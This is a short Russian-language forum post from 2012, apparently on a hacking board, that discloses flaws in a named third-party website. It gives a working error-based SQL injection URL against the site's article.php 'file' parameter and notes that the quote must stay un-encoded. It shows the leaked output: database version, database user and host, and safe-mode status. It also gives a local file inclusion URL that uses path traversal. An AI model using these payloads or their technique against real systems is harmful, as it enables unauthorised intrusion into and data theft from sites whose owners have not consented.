22.02.2012, 21:25
|
|
Участник форума
Регистрация: 05.09.2010
Сообщений: 147
С нами:
8255126
Репутация:
78
|
|
SQL INJECTION (error-based) && Local File Include
Для проведения SQL Inj необходимо посылать кавычку не url-кодируя ее в %27.
В бд идет $_SERVER['REQUEST_URI'], так что ваши параметры не декодируются автоматически.
INSERT запрос.
Код:
http://www.zvuk.uu.ru/catalog/article.php?file=ololosha'or%28select/**/count%28*%29/**/from/**/%28select/**/1/**/union/**/select/**/2/**/union/**/select/**/3%29x/**/group/**/by/**/concat%28version%28%29,floor%28rand%280%29*2%29%29%29and'
version(): 4.1.15-log
user(): 3wzvuk@deimos.surnet.ru
SAFE MODE = On
Инклуд картинки для примера:
Код:
http://www.zvuk.uu.ru/catalog/article.php?file=../../../catalog/images/logo.gif
|
|
|